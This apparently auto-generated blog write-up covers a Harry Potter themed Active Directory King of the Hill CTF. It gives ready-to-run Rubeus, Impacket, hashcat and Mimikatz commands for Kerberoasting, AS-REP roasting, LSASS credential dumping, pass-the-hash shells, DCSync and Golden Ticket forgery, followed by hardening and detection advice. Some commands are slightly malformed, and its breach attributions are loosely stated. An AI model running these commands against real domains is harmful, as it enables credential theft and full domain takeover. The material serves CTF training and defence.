Hack In Time 2026: How a Harry Potter Themed AD King of the Hill CTF Reveals Real‑World Attack Paths + Video

Listen to this Post

Featured Image

Introduction:

King of the Hill (KotH) is a competitive CTF format where teams fight to gain and maintain control over a target system. The Hack In Time 2026 challenge, set in an Active Directory environment inspired by Harry Potter, featured two interconnected domains with multiple realistic attack vectors. This write‑up translates those magical but deadly attack paths into actionable technical knowledge, covering enumeration, lateral movement, and privilege escalation using native Windows tools, Linux utilities, and post‑exploitation frameworks.

Learning Objectives:

  • Enumerate Active Directory domains to discover users, groups, and trust relationships using BloodHound and PowerView.
  • Execute Kerberoasting, AS‑REP Roasting, and Pass‑the‑Hash attacks to compromise service accounts and move laterally.
  • Forge Golden Tickets and leverage domain trust attacks to persist as Domain Admin across multiple forests.

You Should Know:

  1. Enumerating the Two Domains: BloodHound + PowerView Deep Dive
    In a KotH scenario with two domains (e.g., `HOGWARTS.LOCAL` and MINISTRY.LOCAL), initial access often comes from a low‑privilege user. The first step is mapping the attack surface.

Step‑by‑step guide – Windows (from a domain‑joined machine):

  1. Collect data with SharpHound (runs on Windows, outputs JSON for BloodHound):
    Download SharpHound.ps1 (or use the compiled exe)
    powershell -exec bypass -c "Import-Module .\SharpHound.ps1; Invoke-BloodHound -CollectionMethod All -Domain HOGWARTS.LOCAL -OutputDirectory C:\temp"
    
  2. Use PowerView (part of PowerSploit) for live enumeration without BloodHound’s graph:
    Get domain users, groups, and computers
    Get-NetUser -Username  | select samaccountname
    Get-NetGroup -GroupName "Domain Admins"
    Get-NetComputer -FullData | select dnshostname, operatingsystem
    
  3. On Linux (using Impacket), enumerate via SMB/RPC from a non‑domain machine:
    Enumerate domain users
    impacket-lookupsid hogwarts.local/katie.bell:[email protected]
    List shares anonymously
    impacket-smbclient -no-pass //10.10.10.10/SYSVOL
    

What this does: BloodHound reveals hidden relationships – which users can RDP into servers, which groups are nested into privileged groups, and shortest attack paths to Domain Admin. PowerView gives real‑time AD queries. Use these to identify a Kerberoastable user or a machine with unconstrained delegation.

  1. Kerberoasting & AS‑REP Roasting – Extracting Service Tickets
    Service accounts with SPNs (Service Principal Names) are common in AD. If they use weak passwords, you can crack their TGS offline. AS‑REP roasting targets users without pre‑authentication.

Step‑by‑step guide – Windows (Rubeus):

 Kerberoast all users with SPNs, output in Hashcat format
Rubeus.exe kerberoast /outfile:kerb_hash.txt /simple
 AS‑REP roast for users with "Do not require Kerberos pre‑authentication"
Rubeus.exe asreproast /outfile:asrep_hash.txt

On Linux (Impacket & Hashcat):

 Kerberoasting from Linux using GetUserSPNs
impacket-GetUserSPNs hogwarts.local/katie.bell:Password123 -dc-ip 10.10.10.10 -request -outputfile kerb_hash.txt
 AS‑REP roast
impacket-GetNPUsers hogwarts.local/ -dc-ip 10.10.10.10 -request -no-pass -usersfile users.txt
 Crack with hashcat (mode 13100 for Kerberoast, 18200 for AS‑REP)
hashcat -m 13100 kerb_hash.txt /usr/share/wordlists/rockyou.txt

Real‑world context: In the Harry Potter CTF, a Kerberoastable account `hermione.granger` with SPN `MSSQLSvc/castle.hogwarts.local` led to credentials granting access to the Ministry domain’s backup server.

3. Pass‑the‑Hash & Overpass‑the‑Hash – Lateral Movement

Once you crack a hash or dump one from LSASS, you don’t need the plaintext password. Pass‑the‑Hash (PtH) works on Windows, Overpass‑the‑Hash requests a TGT using the hash.

Step‑by‑step guide – Using Mimikatz (Windows):

 Dump hashes from memory (requires admin)
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
 Pass‑the‑Hash to a remote machine
mimikatz.exe "privilege::debug" "sekurlsa::pth /user:administrator /domain:hogwarts.local /ntlm:<NTLM_hash> /run:powershell.exe"

From Linux (using Impacket’s psexec or wmiexec):

 Pass the hash to gain shell
impacket-psexec hogwarts.local/[email protected] -hashes :<NTLM_hash>

Overpass‑the‑Hash with Rubeus:

 Request TGT using NTLM hash
Rubeus.exe asktgt /user:administrator /domain:hogwarts.local /ntlm:<NTLM_hash> /ptt

What this does: After compromising a service account via Kerberoasting, you often get an NTLM hash. Using PtH, you can move to any machine where that account has local admin rights – a typical KotH flag‑grabbing technique.

  1. Golden Ticket Attack – Forging TGTs with krbtgt Hash
    The ultimate persistence in a single domain. If you obtain the `krbtgt` account’s hash, you can forge a TGT for any user – including Domain Admin – with arbitrary lifetime.

Step‑by‑step guide – Mimikatz (Windows, as Domain Admin or with LSASS dump):

 Get krbtgt hash (requires high privileges)
mimikatz.exe "lsadump::dcsync /user:hogwarts\krbtgt" exit
 Forge a Golden Ticket for a fake user "voldemort" with 10‑year lifetime
mimikatz.exe "kerberos::golden /user:voldemort /domain:hogwarts.local /sid:S-1-5-21-... /krbtgt:<krbtgt_hash> /id:500 /groups:512 /ptt" exit

Verify ticket with `klist` then access any resource:

dir \dc.hogwarts.local\c$

Defensive detection: Monitor Event ID 4624 (anomalous logons), 4768 (TGT requests with odd flags), and use `klist` to check for forged tickets (e.g., excessive lifetime, SID history).

CTF twist: The two domains had a trust relationship. With a Golden Ticket in HOGWARTS, you could abuse SIDHistory or inter‑domain TGT delegation to jump into `MINISTRY` – mimicking a real forest‑wide compromise.

5. Mitigating & Hardening Active Directory (Defender’s Section)

To prevent these attacks in your own environment (or to defend the Hill in a KotH), implement these controls.

Step‑by‑step hardening guide:

  1. Enforce AES Kerberos encryption – disable RC4 for service accounts:
    Set-ADUser -Identity service_sql -KerberosEncryptionType AES128,AES256
    
  2. Enable Advanced Audit Policy to log Kerberoasting activity (Event ID 4769 – weak encryption type requested).
  3. Use LAPS (Local Administrator Password Solution) to prevent PtH from spreading:
    Deploy LAPS via GPO and set random, unique local admin passwords
    
  4. Limit unconstrained delegation – configure only trusted servers (e.g., domain controllers) for delegation.
  5. For Linux defenders – monitor Impacket usage via network signatures (e.g., SMB traffic with `psexec` service creation). Deploy Zeek with AD scripts to detect `GetUserSPNs` queries.

What this does: Each mitigation directly blocks the attack paths described. LAPS stops lateral movement with stolen hashes; disabling RC4 forces attackers to crack AES keys (impractical); auditing gives you alerting.

What Undercode Say:

  • Key Takeaway 1: CTF King of the Hill challenges, especially those with multi‑domain AD setups, mirror real‑world red team operations. Mastering tools like Rubeus, Mimikatz, and BloodHound translates directly to enterprise pentesting.
  • Key Takeaway 2: Offensive AD techniques rely on misconfigurations – weak service account passwords, unconstrained delegation, and RC4 encryption. Defenders must prioritize patching these “magical” but dangerous defaults before an attacker does.

Analysis: The Harry Potter theme may seem whimsical, but the underlying attacks (Kerberoasting, Golden Ticket) have been used in major breaches like NotPetya and numerous ransomware incidents. By learning to execute and detect them in a safe CTF environment, both red and blue teams gain muscle memory that saves real infrastructure. The inclusion of two domains with trust relationships teaches a crucial lesson: forest‑wide compromise often starts from a single low‑privilege user in a child domain.

Prediction:

As hybrid and cloud‑joined AD (Azure AD Connect) becomes ubiquitous, attack paths will shift from on‑prem Kerberoasting to cloud‑based token theft and PRT (Primary Refresh Token) abuse. Future King of the Hill CTFs will integrate Entra ID (Azure AD) and on‑prem AD with cross‑environment attacks like “Golden SAML” and “Azure AD Kerberoasting.” Defenders will rely on AI‑driven UEBA to detect anomalous TGT requests and lateral movement in milliseconds – but until then, mastering the 2026 Hogwarts lab remains the best training ground.

▶️ Related Video (70% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Christopher Thiefin – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky